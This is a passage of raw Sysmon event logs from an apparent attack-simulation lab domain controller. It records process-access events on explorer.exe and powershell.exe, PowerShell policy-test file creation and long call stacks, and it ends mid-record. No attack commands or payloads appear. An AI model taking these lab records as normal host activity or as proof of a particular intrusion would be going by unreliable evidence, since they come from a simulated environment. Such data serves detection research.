16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.733{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.623{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243854Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.623{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243853Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.575{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243852Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.575{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002243851Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:12.545{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584\PSHost.132591777724458449.10584.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002243850Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.529{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mltngbdk.uzj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002243849Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.529{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mf0gvlsg.dzn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002243848Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.514{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_mf0gvlsg.dzn.ps12021-03-02 16:56:12.514 10341000x80000000000000002243847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.498{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.451{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002243845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.451{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A920757BB8FC30FE24F54694E3627AF3,SHA256=85C61DEC1D7A4019377E0A009BE969B480D5A895C5F30EE23EBF9753A6DE4F18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002243843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002243838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:12.436{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E2C-603E-F8AA-00000000AD01}10584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64c